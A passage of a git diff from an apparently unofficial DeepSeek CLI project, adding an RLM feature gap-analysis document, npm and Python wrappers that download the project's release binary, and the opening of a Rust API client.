**Current Status**: DeepSeek CLI now includes a shared RLM session with dedicated tools (`rlm_load`, `rlm_exec`, `rlm_query`, `rlm_status`) and an RLM system prompt that externalizes context. Remaining gaps are mostly around deeper recursive orchestration and semantic chunking.
|
||||
|
||||
## Update (v0.1.6)
|
||||
|
||||
The following RLM gaps have been addressed in Sprint 2/3:
|
||||
|
||||
- **REPL integration** via `rlm_exec` tool against a shared RLM session
|
||||
- **Sub-call support** via `rlm_query` with batch and verify modes
|
||||
- **Externalized context** with RLM context summaries injected into the system prompt
|
||||
- **RLM-specific prompt** (`src/prompts/rlm.txt`) with FINAL / FINAL_VAR guidance
|
||||
- **Chunking helpers** (`chunk_sections`, `chunk_lines`, `chunk_auto`) for semantic-ish splits
|
||||
- **Auto-chunk batching** (`rlm_query` + `auto_chunks`) for whole-doc sweeps
|
||||
- **Buffer variables** (`vars/get/set/append/del` + `store_as` + FINAL_VAR parsing)
|
||||
- **Usage tracking** for RLM sub-calls (query count + token totals)
|
||||
- **REPL toggle** (`/repl`) with RLM chat default
|
||||
- **LLM-managed context loading** (`rlm_load`, plus `/load @path` workspace support)
|
||||
- **RLM session status** (`rlm_status` for context + usage summaries)
|
||||
- **Auto-RLM switching** for large file requests and large pastes (keeps small-context queries in base mode per paper tradeoff)
|
||||
- **RLM usage guardrails** in the footer (warns on high query/token usage)
|
||||
|
||||
Remaining opportunities (low priority): deeper recursive sub-agent loops and more model-specific prompt tuning.
|
||||
|
||||
---
|
||||
|
||||
## Key RLM Concepts (From Paper)
|
||||
|
||||
### Core Architecture
|
||||
1. **REPL Environment**: Python REPL where context is loaded as a variable
|
||||
2. **llm_query Function**: Enables recursive sub-LM calls within the REPL
|
||||
3. **Context as External Variable**: Prompt is NOT fed directly to the LLM
|
||||
4. **Programmatic Context Interaction**: Model writes code to examine/decompose context
|
||||
5. **Buffer Variables**: Accumulate partial results across recursive calls
|
||||
6. **FINAL/FINAL_VAR Tags**: Structured answer output mechanism
|
||||
|
||||
### Key Behaviors
|
||||
- Iterative code execution in REPL
|
||||
- Dynamic context chunking based on analysis
|
||||
- Recursive sub-calls for information-dense tasks
|
||||
- Answer verification through sub-LM calls
|
||||
- Cost-aware sub-call batching
|
||||
|
||||
---
|
||||
|
||||
## Gap Analysis
|
||||
|
||||
### 1. Missing REPL Integration for LLM
|
||||
|
||||
**RLM Paper Requirement:**
|
||||
> "The REPL environment is initialized with: 1) A 'context' variable that contains extremely important information about your query. 2) A 'llm_query' function that allows you to query an LLM inside your REPL environment. 3) The ability to use 'print()' statements to view the output of your REPL code."
|
||||
|
||||
**Current DeepSeek Implementation (v0.1.6):**
|
||||
- RLM mode exposes `rlm_exec` and `rlm_query` tools to the model
|
||||
- REPL expressions operate on shared session state across turns
|
||||
- LLM can execute expressions and spawn sub-calls from tool usage
|
||||
|
||||
**Gap Severity:** 🟢 LOW
|
||||
|
||||
**Status:** ✅ Addressed via RLM tools + prompt integration
|
||||
|
||||
---
|
||||
|
||||
### 2. No Recursive Sub-Call Architecture
|
||||
|
||||
**RLM Paper Requirement:**
|
||||
> "RLMs defer essentially unbounded-length reasoning chains to sub-(R)LM calls... RLMs store the output of sub-LM calls over the input in variables and stitch them together to form a final answer."
|
||||
|
||||
**Current DeepSeek Implementation (v0.1.6):**
|
||||
- Recursive sub-calls are now available via repeated `rlm_query` tool invocations
|
||||
- Shared buffer variables allow stitching results across calls
|
||||
- Sub-agent nesting is still flat (no hierarchical runtime)
|
||||
|
||||
**Gap Severity:** 🟡 MEDIUM
|
||||
|
||||
**Remaining Enhancements:**
|
||||
- Optional nested sub-agent orchestration with shared buffers + depth limits
|
||||
|
||||
---
|
||||
|
||||
### 3. Missing RLM-Specific System Prompts
|
||||
|
||||
**RLM Paper Requirement:**
|
||||
> "You are tasked with answering a query with associated context... You can access, transform, and analyze this context interactively in a REPL environment that can recursively query sub-LLs, which you are strongly encouraged to use as much as possible."
|
||||
|
||||
**Current DeepSeek Implementation (v0.1.6):**
|
||||
- Dedicated RLM prompt (`src/prompts/rlm.txt`) with REPL/tool guidance
|
||||
- RLM sub-call prompt enforces FINAL / FINAL_VAR output conventions
|
||||
- Prompt guidance for batching and verification
|
||||
|
||||
**Gap Severity:** 🟢 LOW
|
||||
|
||||
**Status:** ✅ Addressed
|
||||
|
||||
---
|
||||
|
||||
### 4. No Context Offloading to External Environment
|
||||
|
||||
**RLM Paper Requirement:**
|
||||
> "The key insight is that long prompts should not be fed into the neural network directly but should instead be treated as part of the environment that the LLM can symbolically interact with."
|
||||
|
||||
**Current DeepSeek Implementation (v0.1.6):**
|
||||
- RLM contexts are stored externally in `RlmSession`
|
||||
- Only summaries are injected into the system prompt
|
||||
- LLM accesses context via `rlm_exec`, `rlm_query`, and `rlm_load`
|
||||
|
||||
**Gap Severity:** 🟢 LOW
|
||||
|
||||
**Status:** ✅ Addressed
|
||||
|
||||
---
|
||||
|
||||
### 5. Missing Context Chunking Intelligence
|
||||
|
||||
**RLM Paper Requirement:**
|
||||
> "An example strategy is to first look at the context and figure out a chunking strategy, then break up the context into smart chunks, and query an LLM per chunk with a particular question."
|
||||
|
||||
**Current DeepSeek Implementation (v0.1.6):**
|
||||
- Fixed-size chunking (`chunk`) plus `chunk_sections`, `chunk_lines`, and `chunk_auto`
|
||||
- LLM controls chunking via `rlm_exec` before issuing sub-calls
|
||||
- `rlm_query auto_chunks` enables whole-document sweeps over `chunk_auto`
|
||||
- No true semantic chunking (AST/function/paragraph-aware)
|
||||
|
||||
**Current Code (src/rlm.rs):**
|
||||
```rust
|
||||
pub fn chunk(&self, chunk_size: usize, overlap: usize) -> Vec<ChunkInfo> {
|
||||
// Fixed-size character-based chunking only
|
||||
}
|
||||
```
|
||||
|
||||
**Gap Severity:** 🟡 MEDIUM
|
||||
|
||||
**Remaining Enhancements:**
|
||||
- Deeper semantic chunking (AST/function-aware) and richer metadata
|
||||
|
||||
---
|
||||
|
||||
### 6. No Buffer Variable System
|
||||
|
||||
**RLM Paper Requirement:**
|
||||
> "Use these variables as buffers to build up your final answer... store the output of sub-LM calls over the input in variables and stitch them together."
|
||||
|
||||
**Current DeepSeek Implementation (v0.1.6):**
|
||||
- Buffer variables are supported via `vars/get/set/append/del`
|
||||
- `rlm_query` supports `store_as` + FINAL_VAR parsing to persist results
|
||||
- Variables persist per context across tool calls
|
||||
|
||||
**Current Code (src/rlm.rs):**
|
||||
```rust
|
||||
pub struct RlmContext {
|
||||
pub variables: HashMap<String, String>,
|
||||
...
|
||||
}
|
||||
```
|
||||
|
||||
**Gap Severity:** 🟢 LOW
|
||||
|
||||
**Status:** ✅ Addressed
|
||||
|
||||
---
|
||||
|
||||
### 7. Missing Answer Verification Pattern
|
||||
|
||||
**RLM Paper Requirement:**
|
||||
> "We observed several instances of answer verification made by RLMs through sub-LM calls... Some of these strategies implicitly avoid context rot by using sub-LMs to perform verification."
|
||||
|
||||
**Current DeepSeek Implementation (v0.1.6):**
|
||||
- `rlm_query` supports `mode="verify"` for explicit verification calls
|
||||
- LLM can batch verification queries to cross-check answers
|
||||
|
||||
**Gap Severity:** 🟢 LOW
|
||||
|
||||
**Remaining Enhancements:**
|
||||
- Optional confidence scoring or contradiction heuristics
|
||||
|
||||
---
|
||||
|
||||
### 8. No Cost-Aware Sub-Call Batching
|
||||
|
||||
**RLM Paper Requirement (Appendix D.1):**
|
||||
> "IMPORTANT: Be very careful about using 'llm_query' as it incurs high runtime costs. Always batch as much information as reasonably possible into each call (aim for around 200k characters per call)."
|
||||
|
||||
**Current DeepSeek Implementation (v0.1.6):**
|
||||
- Sub-call usage tracking (query count + token totals)
|
||||
- Prompt guidance to batch queries and cap payload size
|
||||
- `rlm_status` exposes aggregate usage stats
|
||||
- Footer guardrails warn on high query/token usage
|
||||
|
||||
**Gap Severity:** 🟢 LOW
|
||||
|
||||
**Remaining Enhancements:**
|
||||
- Optional hard caps or per-model budget limits
|
||||
|
||||
---
|
||||
|
||||
### 9. No Iterative REPL Loop Integration
|
||||
|
||||
**RLM Paper Requirement:**
|
||||
> "You will be queried iteratively until you provide a final answer... Output to the REPL environment and recursive LLMs as much as possible."
|
||||
|
||||
**Current DeepSeek Implementation (v0.1.6):**
|
||||
- Shared RLM session persists across tool calls and turns
|
||||
- LLM iteratively invokes `rlm_exec`/`rlm_query` within a single turn
|
||||
- FINAL / FINAL_VAR markers enforced in prompts
|
||||
|
||||
**Gap Severity:** 🟢 LOW
|
||||
|
||||
**Status:** ✅ Addressed
|
||||
|
||||
---
|
||||
|
||||
### 10. Missing Model-Specific RLM Tuning
|
||||
|
||||
**RLM Paper Requirement:**
|
||||
> "The only difference in the prompt is an extra line... warning against using too many sub-calls... Between GPT-5 and Qwen3-Coder, we found different behavior... models are inefficient decision makers over their context."
|
||||
|
||||
**Current DeepSeek Implementation:**
|
||||
- Single system prompt for all sub-agent types
|
||||
- No model-specific tuning
|
||||
- No adaptive prompting based on model behavior
|
||||
- No sub-call warning mechanisms
|
||||
|
||||
**Gap Severity:** 🟢 LOW
|
||||
|
||||
**Required Implementation:**
|
||||
- Model-aware prompting strategies
|
||||
- Adaptive sub-call limits per model
|
||||
- Behavior monitoring and correction
|
||||
- Per-model cost/performance tracking
|
||||
|
||||
---
|
||||
|
||||
## Remaining Optional Components
|
||||
|
||||
The core RLM workflow is now implemented via tools (`rlm_load`, `rlm_exec`, `rlm_query`, `rlm_status`)
|
||||
and prompt integration. The following are optional future refactors:
|
||||
|
||||
- **`src/rlm_engine.rs`**: central orchestration layer if RLM logic grows
|
||||
- **`src/rlm_prompts.rs`**: model-specific prompt variants and tuning
|
||||
- **`src/rlm_repl.rs`**: richer syntax/REPL language (current expressions are sufficient)
|
||||
- **`src/tools/subagent.rs`**: nested sub-agent orchestration with shared buffers
|
||||
|
||||
---
|
||||
|
||||
## Remaining Improvements (Post-Sprint 3)
|
||||
|
||||
| Priority | Gap | Files to Change | Effort |
|
||||
|----------|-----|-----------------|--------|
|
||||
| P2 | Semantic chunking + metadata | rlm.rs | Medium |
|
||||
| P2 | Budget hard caps / per-model limits | rlm.rs, tui/ui.rs | Medium |
|
||||
| P3 | Nested sub-agent orchestration | tools/subagent.rs | High |
|
||||
| P3 | Model-specific tuning | prompts/rlm.txt or new module | Low |
|
||||
|
||||
---
|
||||
|
||||
## Comparison Summary
|
||||
|
||||
| Aspect | RLM Paper | DeepSeek CLI | Gap |
|
||||
|--------|-----------|-------------|-----|
|
||||
| Context Handling | External variable in REPL | Externalized RLM session + prompt summary | 🟢 LOW |
|
||||
| Sub-Calls | Recursive with buffers | `rlm_query` + shared buffers (no nested runtime) | 🟡 MEDIUM |
|
||||
| REPL | Python REPL with llm_query | Tool-based REPL (`rlm_exec` + `rlm_query`) | 🟢 LOW |
|
||||
| Output Format | FINAL/FINAL_VAR tags | Enforced in RLM prompts | 🟢 LOW |
|
||||
| System Prompts | RLM-specific with examples | RLM + sub-call prompts | 🟢 LOW |
|
||||
| Context Chunking | Adaptive, semantic | Fixed + section/line/auto chunking | 🟡 MEDIUM |
|
||||
| Buffer Variables | Persistent across calls | Vars + store_as + FINAL_VAR | 🟢 LOW |
|
||||
| Cost Tracking | Per-sub-call budgeting | Usage totals + batch guidance + UI warnings | 🟢 LOW |
|
||||
| Answer Verification | Sub-LM confirmation | Verify mode in `rlm_query` | 🟢 LOW |
|
||||
| Iterative Execution | Multi-turn REPL loop | Shared session across turns | 🟢 LOW |
|
||||
|
||||
---
|
||||
|
||||
## References
|
||||
|
||||
- Khattab, O., Kraska, A., & Zhang, A. L. (2025). Recursive Language Models. arXiv:2512.24601
|
||||
- DeepSeek CLI Implementation: src/rlm.rs, src/tools/subagent.rs
|
||||
+36
@@ -0,0 +1,36 @@
|
||||
#!/usr/bin/env node
|
||||
/**
|
||||
* CLI wrapper - executes the downloaded DeepSeek binary.
|
||||
*/
|
||||
|
||||
const { spawn } = require("child_process");
|
||||
const path = require("path");
|
||||
const fs = require("fs");
|
||||
|
||||
const binDir = path.join(__dirname, "bin");
|
||||
const binName = process.platform === "win32" ? "deepseek.exe" : "deepseek";
|
||||
const binPath = path.join(binDir, binName);
|
||||
|
||||
// Check for override
|
||||
const override = process.env.DEEPSEEK_CLI_PATH;
|
||||
const effectivePath = override && fs.existsSync(override) ? override : binPath;
|
||||
|
||||
if (!fs.existsSync(effectivePath)) {
|
||||
console.error("DeepSeek CLI binary not found.");
|
||||
console.error("Try reinstalling: npm install -g @hmbown/deepseek-tui");
|
||||
process.exit(1);
|
||||
}
|
||||
|
||||
// Spawn the binary with all arguments
|
||||
const child = spawn(effectivePath, process.argv.slice(2), {
|
||||
stdio: "inherit",
|
||||
});
|
||||
|
||||
child.on("error", (err) => {
|
||||
console.error("Failed to start DeepSeek CLI:", err.message);
|
||||
process.exit(1);
|
||||
});
|
||||
|
||||
child.on("exit", (code) => {
|
||||
process.exit(code ?? 0);
|
||||
});
|
||||
@@ -0,0 +1,93 @@
|
||||
#!/usr/bin/env node
|
||||
/**
|
||||
* Postinstall script - downloads the DeepSeek CLI binary for the current platform.
|
||||
*/
|
||||
|
||||
const https = require("https");
|
||||
const fs = require("fs");
|
||||
const path = require("path");
|
||||
const { execSync } = require("child_process");
|
||||
|
||||
const VERSION = require("./package.json").version;
|
||||
const REPO = "Hmbown/DeepSeek-TUI";
|
||||
|
||||
const PLATFORMS = {
|
||||
"linux-x64": "deepseek-linux-x64",
|
||||
"darwin-arm64": "deepseek-macos-arm64",
|
||||
"darwin-x64": "deepseek-macos-x64",
|
||||
"win32-x64": "deepseek-windows-x64.exe",
|
||||
};
|
||||
|
||||
async function main() {
|
||||
const platform = `${process.platform}-${process.arch}`;
|
||||
const assetName = PLATFORMS[platform];
|
||||
|
||||
if (!assetName) {
|
||||
console.error(`Unsupported platform: ${platform}`);
|
||||
console.error(`Supported: ${Object.keys(PLATFORMS).join(", ")}`);
|
||||
process.exit(1);
|
||||
}
|
||||
|
||||
const binDir = path.join(__dirname, "bin");
|
||||
const binName = process.platform === "win32" ? "deepseek.exe" : "deepseek";
|
||||
const binPath = path.join(binDir, binName);
|
||||
|
||||
// Skip if already exists
|
||||
if (fs.existsSync(binPath)) {
|
||||
console.log(`DeepSeek CLI already installed at ${binPath}`);
|
||||
return;
|
||||
}
|
||||
|
||||
const url = `https://github.com/${REPO}/releases/download/v${VERSION}/${assetName}`;
|
||||
console.log(`Downloading DeepSeek CLI v${VERSION}...`);
|
||||
|
||||
fs.mkdirSync(binDir, { recursive: true });
|
||||
|
||||
await download(url, binPath);
|
||||
|
||||
// Make executable on Unix
|
||||
if (process.platform !== "win32") {
|
||||
fs.chmodSync(binPath, 0o755);
|
||||
}
|
||||
|
||||
console.log(`Installed DeepSeek CLI to ${binPath}`);
|
||||
}
|
||||
|
||||
function download(url, dest) {
|
||||
return new Promise((resolve, reject) => {
|
||||
const file = fs.createWriteStream(dest);
|
||||
|
||||
function doRequest(requestUrl) {
|
||||
https
|
||||
.get(requestUrl, (response) => {
|
||||
// Handle redirects
|
||||
if (response.statusCode >= 300 && response.statusCode < 400 && response.headers.location) {
|
||||
doRequest(response.headers.location);
|
||||
return;
|
||||
}
|
||||
|
||||
if (response.statusCode !== 200) {
|
||||
reject(new Error(`Download failed: HTTP ${response.statusCode}`));
|
||||
return;
|
||||
}
|
||||
|
||||
response.pipe(file);
|
||||
file.on("finish", () => {
|
||||
file.close();
|
||||
resolve();
|
||||
});
|
||||
})
|
||||
.on("error", (err) => {
|
||||
fs.unlink(dest, () => {});
|
||||
reject(err);
|
||||
});
|
||||
}
|
||||
|
||||
doRequest(url);
|
||||
});
|
||||
}
|
||||
|
||||
main().catch((err) => {
|
||||
console.error("Failed to install DeepSeek CLI:", err.message);
|
||||
process.exit(1);
|
||||
});
|
||||
@@ -0,0 +1,27 @@
|
||||
{
|
||||
"name": "@hmbown/deepseek-tui",
|
||||
"version": "0.1.0",
|
||||
"description": "Unofficial DeepSeek CLI - downloads and runs the Rust binary",
|
||||
"keywords": ["deepseek", "cli", "ai", "agent", "m2.1"],
|
||||
"homepage": "https://github.com/Hmbown/DeepSeek-TUI",
|
||||
"repository": {
|
||||
"type": "git",
|
||||
"url": "git+https://github.com/Hmbown/DeepSeek-TUI.git"
|
||||
},
|
||||
"license": "MIT",
|
||||
"author": "Hmbown",
|
||||
"bin": {
|
||||
"deepseek": "cli.js"
|
||||
},
|
||||
"scripts": {
|
||||
"postinstall": "node install.js"
|
||||
},
|
||||
"files": [
|
||||
"cli.js",
|
||||
"install.js",
|
||||
"bin"
|
||||
],
|
||||
"engines": {
|
||||
"node": ">=16"
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,31 @@
|
||||
[build-system]
|
||||
requires = ["setuptools>=68", "wheel"]
|
||||
build-backend = "setuptools.build_meta"
|
||||
|
||||
[project]
|
||||
name = "DeepSeek-CLI"
|
||||
version = "0.0.1"
|
||||
description = "Unofficial DeepSeek CLI - downloads and runs the Rust binary"
|
||||
readme = "README.md"
|
||||
requires-python = ">=3.8"
|
||||
authors = [{ name = "Hmbown" }]
|
||||
keywords = ["deepseek", "cli", "ai", "agent"]
|
||||
classifiers = [
|
||||
"Development Status :: 3 - Alpha",
|
||||
"Programming Language :: Python :: 3",
|
||||
"License :: OSI Approved :: MIT License",
|
||||
"Operating System :: OS Independent",
|
||||
]
|
||||
|
||||
[project.urls]
|
||||
Homepage = "https://github.com/Hmbown/DeepSeek-CLI"
|
||||
Source = "https://github.com/Hmbown/DeepSeek-CLI"
|
||||
|
||||
[project.scripts]
|
||||
deepseek-cli = "deepseek_cli.cli:main"
|
||||
|
||||
[tool.setuptools.package-dir]
|
||||
"" = "python"
|
||||
|
||||
[tool.setuptools.packages.find]
|
||||
where = ["python"]
|
||||
@@ -0,0 +1,34 @@
|
||||
from importlib.metadata import PackageNotFoundError, version
|
||||
from pathlib import Path
|
||||
from typing import Optional
|
||||
import re
|
||||
|
||||
__all__ = ["__version__"]
|
||||
|
||||
|
||||
def _version_from_metadata() -> Optional[str]:
|
||||
for dist_name in ("DeepSeek-CLI", "deepseek-cli", "DeepSeek_CLI"):
|
||||
try:
|
||||
return version(dist_name)
|
||||
except PackageNotFoundError:
|
||||
continue
|
||||
return None
|
||||
|
||||
|
||||
def _version_from_pyproject() -> Optional[str]:
|
||||
this_file = Path(__file__).resolve()
|
||||
for parent in list(this_file.parents)[:6]:
|
||||
candidate = parent / "pyproject.toml"
|
||||
if not candidate.exists():
|
||||
continue
|
||||
try:
|
||||
contents = candidate.read_text(encoding="utf-8")
|
||||
except OSError:
|
||||
continue
|
||||
match = re.search(r'(?m)^version\\s*=\\s*"([^"]+)"\\s*$', contents)
|
||||
if match:
|
||||
return match.group(1)
|
||||
return None
|
||||
|
||||
|
||||
__version__ = _version_from_metadata() or _version_from_pyproject() or "0.0.0"
|
||||
@@ -0,0 +1,84 @@
|
||||
"""Thin wrapper that downloads and runs the DeepSeek CLI binary."""
|
||||
|
||||
import os
|
||||
import platform
|
||||
import stat
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from urllib.request import urlopen
|
||||
|
||||
from deepseek_cli import __version__
|
||||
|
||||
REPO = "Hmbown/DeepSeek-CLI"
|
||||
|
||||
|
||||
def main() -> None:
|
||||
"""Entry point - resolve binary and exec it."""
|
||||
binary = resolve_binary()
|
||||
os.execv(binary, [binary, *sys.argv[1:]])
|
||||
|
||||
|
||||
def resolve_binary() -> str:
|
||||
"""Find or download the deepseek binary."""
|
||||
# Allow override via environment
|
||||
override = os.getenv("DEEPSEEK_CLI_PATH")
|
||||
if override and Path(override).exists():
|
||||
return override
|
||||
|
||||
# Check cache
|
||||
cache_dir = Path.home() / ".deepseek" / "bin" / __version__
|
||||
cache_dir.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
asset_name = get_asset_name()
|
||||
bin_name = "deepseek.exe" if sys.platform == "win32" else "deepseek"
|
||||
dest = cache_dir / bin_name
|
||||
|
||||
if dest.exists():
|
||||
return str(dest)
|
||||
|
||||
if os.getenv("DEEPSEEK_CLI_SKIP_DOWNLOAD") in ("1", "true", "TRUE"):
|
||||
raise RuntimeError("deepseek binary not found and downloads are disabled.")
|
||||
|
||||
# Download from GitHub releases
|
||||
url = f"https://github.com/{REPO}/releases/download/v{__version__}/{asset_name}"
|
||||
print(f"Downloading DeepSeek CLI v{__version__}...", file=sys.stderr)
|
||||
download_binary(url, dest)
|
||||
return str(dest)
|
||||
|
||||
|
||||
def get_asset_name() -> str:
|
||||
"""Get the release asset name for this platform."""
|
||||
system = platform.system().lower()
|
||||
arch = platform.machine().lower()
|
||||
|
||||
if system == "linux" and arch in ("x86_64", "amd64"):
|
||||
return "deepseek-linux-x64"
|
||||
if system == "darwin" and arch in ("arm64", "aarch64"):
|
||||
return "deepseek-macos-arm64"
|
||||
if system == "darwin" and arch in ("x86_64", "amd64"):
|
||||
return "deepseek-macos-x64"
|
||||
if system == "windows" and arch in ("x86_64", "amd64", "amd64"):
|
||||
return "deepseek-windows-x64.exe"
|
||||
|
||||
raise RuntimeError(f"Unsupported platform: {system}/{arch}")
|
||||
|
||||
|
||||
def download_binary(url: str, dest: Path) -> None:
|
||||
"""Download binary from URL to destination."""
|
||||
try:
|
||||
with urlopen(url, timeout=60) as response:
|
||||
data = response.read()
|
||||
except Exception as e:
|
||||
raise RuntimeError(f"Failed to download: {e}") from e
|
||||
|
||||
dest.write_bytes(data)
|
||||
|
||||
# Make executable on Unix
|
||||
if sys.platform != "win32":
|
||||
dest.chmod(dest.stat().st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
|
||||
|
||||
print(f"Installed to {dest}", file=sys.stderr)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
+822
@@ -0,0 +1,822 @@
|
||||
//! HTTP client for the DeepSeek OpenAI-compatible APIs.
|
||||
//!
|
||||
//! Uses the OpenAI Responses API when available, falling back to Chat Completions
|
||||
//! if the Responses endpoint is unsupported by the target base URL.
|
||||
|
||||
use std::pin::Pin;
|
||||
use std::sync::atomic::{AtomicBool, Ordering};
|
||||
|
||||
use anyhow::{Context, Result};
|
||||
use futures_util::stream;
|
||||
use reqwest::header::{AUTHORIZATION, CONTENT_TYPE, HeaderMap, HeaderValue};
|
||||
use serde_json::{Value, json};
|
||||
|
||||
use crate::config::{Config, RetryPolicy};
|
||||
use crate::llm_client::{LlmClient, StreamEventBox};
|
||||
use crate::logging;
|
||||
use crate::models::{
|
||||
ContentBlock, ContentBlockStart, Delta, Message, MessageDelta, MessageRequest, MessageResponse,
|
||||
StreamEvent, SystemPrompt, Tool, Usage,
|
||||
};
|
||||
|
||||
// === Types ===
|
||||
|
||||
/// Client for DeepSeek's OpenAI-compatible APIs.
|
||||
#[must_use]
|
||||
pub struct DeepSeekClient {
|
||||
http_client: reqwest::Client,
|
||||
base_url: String,
|
||||
retry: RetryPolicy,
|
||||
default_model: String,
|
||||
use_chat_completions: AtomicBool,
|
||||
}
|
||||
|
||||
impl Clone for DeepSeekClient {
|
||||
fn clone(&self) -> Self {
|
||||
Self {
|
||||
http_client: self.http_client.clone(),
|
||||
base_url: self.base_url.clone(),
|
||||
retry: self.retry.clone(),
|
||||
default_model: self.default_model.clone(),
|
||||
use_chat_completions: AtomicBool::new(
|
||||
self.use_chat_completions.load(Ordering::Relaxed),
|
||||
),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// === DeepSeekClient ===
|
||||
|
||||
impl DeepSeekClient {
|
||||
/// Create a DeepSeek client from CLI configuration.
|
||||
pub fn new(config: &Config) -> Result<Self> {
|
||||
let api_key = config.deepseek_api_key()?;
|
||||
let base_url = config.deepseek_base_url();
|
||||
let retry = config.retry_policy();
|
||||
let default_model = config
|
||||
.default_text_model
|
||||
.clone()
|
||||
.unwrap_or_else(|| "deepseek-reasoner".to_string());
|
||||
|
||||
logging::info(format!("DeepSeek base URL: {base_url}"));
|
||||
logging::info(format!(
|
||||
"Retry policy: enabled={}, max_retries={}, initial_delay={}s, max_delay={}s",
|
||||
retry.enabled, retry.max_retries, retry.initial_delay, retry.max_delay
|
||||
));
|
||||
|
||||
let mut headers = HeaderMap::new();
|
||||
headers.insert(CONTENT_TYPE, HeaderValue::from_static("application/json"));
|
||||
headers.insert(
|
||||
AUTHORIZATION,
|
||||
HeaderValue::from_str(&format!("Bearer {api_key}"))?,
|
||||
);
|
||||
|
||||
let http_client = reqwest::Client::builder()
|
||||
.default_headers(headers)
|
||||
.build()?;
|
||||
|
||||
Ok(Self {
|
||||
http_client,
|
||||
base_url,
|
||||
retry,
|
||||
default_model,
|
||||
use_chat_completions: AtomicBool::new(false),
|
||||
})
|
||||
}
|
||||
|
||||
async fn create_message_responses(
|
||||
&self,
|
||||
request: &MessageRequest,
|
||||
) -> Result<Result<MessageResponse, ResponsesFallback>> {
|
||||
let mut body = json!({
|
||||
"model": request.model,
|
||||
"input": build_responses_input(&request.messages),
|
||||
"store": false,
|
||||
"max_output_tokens": request.max_tokens,
|
||||
});
|
||||
|
||||
if let Some(instructions) = system_to_instructions(request.system.clone()) {
|
||||
body["instructions"] = json!(instructions);
|
||||
}
|
||||
if let Some(temperature) = request.temperature {
|
||||
body["temperature"] = json!(temperature);
|
||||
}
|
||||
if let Some(top_p) = request.top_p {
|
||||
body["top_p"] = json!(top_p);
|
||||
}
|
||||
if let Some(tools) = request.tools.as_ref() {
|
||||
body["tools"] = json!(tools.iter().map(tool_to_responses).collect::<Vec<_>>());
|
||||
}
|
||||
if let Some(choice) = request.tool_choice.as_ref() {
|
||||
body["tool_choice"] = choice.clone();
|
||||
}
|
||||
|
||||
let url = format!("{}/v1/responses", self.base_url.trim_end_matches('/'));
|
||||
let response =
|
||||
send_with_retry(&self.retry, || self.http_client.post(&url).json(&body)).await?;
|
||||
|
||||
let status = response.status();
|
||||
let response_text = response.text().await.unwrap_or_default();
|
||||
|
||||
if status.as_u16() == 404 || status.as_u16() == 405 {
|
||||
return Ok(Err(ResponsesFallback {
|
||||
status: status.as_u16(),
|
||||
body: response_text,
|
||||
}));
|
||||
}
|
||||
|
||||
if !status.is_success() {
|
||||
anyhow::bail!("Failed to call DeepSeek Responses API: HTTP {status}: {response_text}");
|
||||
}
|
||||
|
||||
let value: Value =
|
||||
serde_json::from_str(&response_text).context("Failed to parse Responses API JSON")?;
|
||||
let message = parse_responses_message(&value)?;
|
||||
Ok(Ok(message))
|
||||
}
|
||||
|
||||
async fn create_message_chat(&self, request: &MessageRequest) -> Result<MessageResponse> {
|
||||
let messages =
|
||||
build_chat_messages(request.system.as_ref(), &request.messages, &request.model);
|
||||
let mut body = json!({
|
||||
"model": request.model,
|
||||
"messages": messages,
|
||||
"max_tokens": request.max_tokens,
|
||||
});
|
||||
|
||||
if let Some(temperature) = request.temperature {
|
||||
body["temperature"] = json!(temperature);
|
||||
}
|
||||
if let Some(top_p) = request.top_p {
|
||||
body["top_p"] = json!(top_p);
|
||||
}
|
||||
if let Some(tools) = request.tools.as_ref() {
|
||||
body["tools"] = json!(tools.iter().map(tool_to_chat).collect::<Vec<_>>());
|
||||
}
|
||||
if let Some(choice) = request.tool_choice.as_ref() {
|
||||
if let Some(mapped) = map_tool_choice_for_chat(choice) {
|
||||
body["tool_choice"] = mapped;
|
||||
}
|
||||
}
|
||||
|
||||
let url = format!(
|
||||
"{}/v1/chat/completions",
|
||||
self.base_url.trim_end_matches('/')
|
||||
);
|
||||
let response =
|
||||
send_with_retry(&self.retry, || self.http_client.post(&url).json(&body)).await?;
|
||||
|
||||
let status = response.status();
|
||||
let response_text = response.text().await.unwrap_or_default();
|
||||
if !status.is_success() {
|
||||
anyhow::bail!("Failed to call DeepSeek Chat API: HTTP {status}: {response_text}");
|
||||
}
|
||||
|
||||
let value: Value =
|
||||
serde_json::from_str(&response_text).context("Failed to parse Chat API JSON")?;
|
||||
parse_chat_message(&value)
|
||||
}
|
||||
}
|
||||
|
||||
// === Trait Implementations ===
|
||||
|
||||
impl LlmClient for DeepSeekClient {
|
||||
fn provider_name(&self) -> &'static str {
|
||||
"deepseek"
|
||||
}
|
||||
|
||||
fn model(&self) -> &str {
|
||||
&self.default_model
|
||||
}
|
||||
|
||||
async fn create_message(&self, request: MessageRequest) -> Result<MessageResponse> {
|
||||
if self.use_chat_completions.load(Ordering::Relaxed) {
|
||||
return self.create_message_chat(&request).await;
|
||||
}
|
||||
|
||||
let request_clone = request.clone();
|
||||
match self.create_message_responses(&request).await? {
|
||||
Ok(message) => Ok(message),
|
||||
Err(fallback) => {
|
||||
logging::warn(format!(
|
||||
"Responses API unavailable (HTTP {}). Falling back to chat completions.",
|
||||
fallback.status
|
||||
));
|
||||
logging::info(format!(
|
||||
"Responses fallback body: {}",
|
||||
crate::utils::truncate_with_ellipsis(&fallback.body, 500, "...")
|
||||
));
|
||||
self.use_chat_completions.store(true, Ordering::Relaxed);
|
||||
self.create_message_chat(&request_clone).await
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
async fn create_message_stream(&self, request: MessageRequest) -> Result<StreamEventBox> {
|
||||
let response = self.create_message(request).await?;
|
||||
let events = build_stream_events(&response);
|
||||
let stream = stream::iter(events.into_iter().map(Ok));
|
||||
Ok(Pin::from(Box::new(stream)))
|
||||
}
|
||||
}
|
||||
|
||||
// === Responses API Helpers ===
|
||||
|
||||
#[derive(Debug)]
|
||||
struct ResponsesFallback {
|
||||
status: u16,
|
||||
body: String,
|
||||
}
|
||||
|
||||
fn system_to_instructions(system: Option<SystemPrompt>) -> Option<String> {
|
||||
match system {
|
||||
Some(SystemPrompt::Text(text)) => Some(text),
|
||||
Some(SystemPrompt::Blocks(blocks)) => {
|
||||
let joined = blocks
|
||||
.into_iter()
|
||||
.map(|b| b.text)
|
